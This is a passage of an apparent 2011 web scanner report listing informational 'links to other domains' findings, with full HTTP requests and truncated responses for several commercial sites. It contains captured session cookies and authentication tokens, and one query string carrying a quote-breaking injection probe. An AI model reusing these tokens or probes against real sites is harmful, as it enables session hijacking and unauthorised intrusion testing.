Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
</div>


<img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /><img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
</noscript>
<!-- End SiteCatalyst code version: H.20.3. -->
<iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.116. https://west.thomson.com/store/secure/ShippingInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingInfo.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:45 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
</div>


<img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /><img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
</noscript>
<!-- End SiteCatalyst code version: H.20.3. -->
<iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.117. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...
<td width="65" valign="center"><img src="http://aac.convio.net/images/run/spacer.gif" alt="" width="10" height="1" align="left" /><img src="http://aac.convio.net/images/walk07/username.gif" border="0" alt="user name" /></td>
...[SNIP]...
<td width="65" valign="center"><img src="http://aac.convio.net/images/run/spacer.gif" alt="" width="10" height="1" align="left" /><img src="http://aac.convio.net/images/walk07/password.gif" border="0" alt="password" /></td>
...[SNIP]...
<th>Team Freddie Mercury - <a class="lc_lighterLink" href="https://secure2.convio.net/aac/site/TRR/Events/AWB08?JServSessionIdr004=839fd626r1.app209a&amp;fr_tjoin=24880&amp;pg=tfind&amp;fr_id=1110">Join Team</a>
...[SNIP]...
<td class="cstmBtnBack" align = "center">

<a class="cstmBtnText" href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a">Support Team Freddie Mercury!</a>
...[SNIP]...
</dl>

<a href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a" title="Make a gift to support Team Freddie Mercury">
Make a gift!
</a>
...[SNIP]...
<td><a title="AIDS Walk Boston on Facebook" href="http://www.facebook.com/AIDSWalkBoston" target="_blank"><img src="../images/content/pagebuilder/AWB-Facebook.png" border="0" alt="AWB-Facebook-Icon-55px" width="40" height="40" />
...[SNIP]...
<td><a title="AIDS Walk Boston on Twitter" href="http://twitter.com/aidswalkboston" target="_blank"><img style="border: 0pt none;" src="../images/content/pagebuilder/AWB-Twitter.png" border="0" alt="AWB-Twitter-Icon-55px" width="40" height="40" />
...[SNIP]...
<td><a title="AIDS Walk Boston on YouTube" href="http://www.youtube.com/user/aidsaction" target="_blank"><img style="border: 0pt none;" src="../images/content/pagebuilder/AWB-YouTube.png" border="0" alt="AWB-YouTube-Icon-55px" width="40" height="40" />
...[SNIP]...
<td><a title="AIDS Walk Boston on LinkedIn" href="http://events.linkedin.com/25th-AIDS-Walk-Boston/pub/131531" target="_blank"><img style="border: 0pt none;" src="../images/content/pagebuilder/AWB-LinkedIn.png" border="0" alt="AWB-LinkedIn-Icon-55px" width="40" height="40" />
...[SNIP]...
<td align="center" valign="top"><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
<noscript>Get the <a href="http://www.widgetbox.com/widget/aids-walk-boston-online">AIDS Walk Boston Online</a> widget and many other <a href="http://www.widgetbox.com/">great free widgets</a> at <a href="http://www.widgetbox.com">Widgetbox</a>;! Not seeing a widget? (<a href="http://docs.widgetbox.com/using-widgets/installing-widgets/why-cant-i-see-my-widget/">More info</a>
...[SNIP]...
<td colspan="2" align="right" valign="top"><iframe style="border: medium none; overflow: hidden; width: 450px; height: 80px;" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhome.php%3Fsrc%3Dfftb%23%21%2FAIDSWalkBoston&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;font=trebuchet+ms&amp;colorscheme=light&amp;height=80" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

19.118. http://www.allpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allpages.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?980251%22';944334 HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:16 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48763

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
</font>&nbsp;<A HREF="http://health.allrefer.com/">Health</A>| <A HREF="http://reference.allrefer.com/">Reference</A> | <A HREF="http://weather.allrefer.com/">Weather</A>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

19.119. http://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809332.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: vid=51857023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44049

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!-- MVT Rotation test: D55602D1FF1E5348 -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<td id="terms" class="TERMS" valign="top" align="center">
                           Aptimus, Inc. |    <a style="color:#000000" href="http://www.aptimus.com/terms.shtml" target="_blank">
                                       Terms of Service
                                   </a> | <a style="color:#000000" href="http://www.aptimus.com/privacy.shtml" target="_blank">
                                       Privacy Policy
                                   </a>
...[SNIP]...

19.120. https://www.bcbst.com/accounttools/public/askUserId.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/public/askUserId.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 20:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000JjcWGgqTGgodjkS-3rChz2B:148u7u772; Path=/
Server: WebSphere Application Server/6.1
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b;path=/;secure;httponly
Content-Length: 25749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


        <html>
<head>
<title>Account Management - BCBST.com</title>
<meta name="page title" content="A
...[SNIP]...
</a>&nbsp; &nbsp; <a href="https://twitter.com/BCBSTennessee"><img src="/images/icons/twitter-24.gif" alt="BCBSTennessee on Twitter" width="24" height="23" border="0" align="top" />
...[SNIP]...

19.121. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/bm/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bertelsmann_corp/wms41/bm/index.php?language=2 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:20 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BERTELSMANN_CORP_BEESITE=054ecf29cc8b85f5cefba0141cab9674; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
P3P: CP="IDC ADM DEV PSAi OUR IND ONL COM NAV"
Last-Modified: Tue, 26 Apr 2011 22:40:20 GMT
Cache-Control: private, no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Bertelsmann - me
...[SNIP]...
<META NAME="DC.Rights" CONTENT="Alle Rechte liegen bei der Bertelsmann AG">
       <link rel="alternate" type="application/rss+xml" title="Bertelsmann Pressenews als RSS-Feed" href="http://www.bertelsmann.de/bertelsmann_corp/wms41/rss/rss_news.php?language=2">
   <link rel="stylesheet" type="text/css" href="../css/style.css">
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/rss/rss_news.php?language=2" class="rss">RSS Feed</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=784&language=2" target="_blank">Bertelsmann Essentials</a>
...[SNIP]...
<td><a href="http://createyourowncareer.com" target="_blank">Jobs & Careers</a>
...[SNIP]...
<li><a href="http://213.83.55.196/bertelsmann_corp/wms41/customers/bmcorp/av/Bertelsmann_Final_eng_H264.wmv" target="_blank" class="arrow">Corporate Video</a>
...[SNIP]...
<li><a href="http://www.createyourowncareer.com" target="_blank" class="arrow">Create Your Own Career</a>
...[SNIP]...
<li><a href="http://www.chroniclebertelsmann.com/en/175_years_bertelsmann" target="_blank" class="arrow">Bertelsmann-Chronicles </a>
...[SNIP]...
<div class="box_frame">
                           <a href="http://bertelsmann.corporate-reports.net/bertelsmann/annual/2010/gb/index.php?lang=en" target="_blank" title="" name="star_link_pic" id="LINKID6123_0" ><img src="/bertelsmann_corp/wms41/customers/bmcorp/images/Geschaeftsbericht_2010_Annual_Report_COM_spotlight214x118_0311.jpg" border="0" alt="Picture of Interactive Annual Report 2010" title="Picture
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12"></script>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=784&language=2" target="_self" title="" class="" name="LINKID5563">Bertelsmann Essentials</a>
...[SNIP]...
<li class="five"><a href="http://createyourowncareer.com/wms/bmhr/index.php" target="_blank" title="" name="LINKID5058">Jobs & Careers</a>
...[SNIP]...
<li><a href="http://createyourowncareer.com/Professionals.html" target="_blank" title="" name="LINKID5164">Professionals</a>
...[SNIP]...
<li><a href="http://createyourowncareer.com/Graduates-and-Programs.html" target="_blank" title="" name="LINKID5162">Graduates and Programs</a>
...[SNIP]...
<li><a href="http://createyourowncareer.com/Entry-Level.html" target="_blank" title="" name="LINKID5055">Entry Level</a>
...[SNIP]...
<li><a href="http://createyourowncareer.com/Students-and-Interns.html" target="_blank" title="" name="LINKID5056">Students and Interns</a>
...[SNIP]...
<li><a href="http://createyourowncareer.com/Working-at-Bertelsmann.html" target="_blank" title="" name="LINKID5057">Working at Bertelsmann</a>
...[SNIP]...
<li class="six"><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?language=2" target="_blank" title="" name="LINKID5088">Corporate Responsibility</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=783&language=2" target="_blank" title="" name="LINKID5077">CR at Bertelsmann</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=790&language=2" target="_blank" title="" name="LINKID5078">Employees</a></li>
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=797&language=2" target="_blank" title="" name="LINKID5079">Governance and Compliance</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=802&language=2" target="_blank" title="" name="LINKID5080">Media Content and Products</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=810&language=2" target="_blank" title="" name="LINKID5081">Environment</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=815&language=2" target="_blank" title="" name="LINKID5083">Local CR Efforts</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=820&language=2" target="_blank" title="" name="LINKID5085">CR Facts & Figures</a>
...[SNIP]...
<li><a href="http://www.bertelsmann.de/bertelsmann_corp/wms41/cr/index.php?ci=825&language=2" target="_blank" title="" name="LINKID5087">News</a>
...[SNIP]...

19.122. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?scope=web&mkt=en-US&FORM=MSMONY HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; _FS=mkt=en-US; _HOP=I=2&TS=1303843123

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:38:44 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 28182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,19.1')">MSN</a> | </li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,21.1')">Hotmail</a>
...[SNIP]...
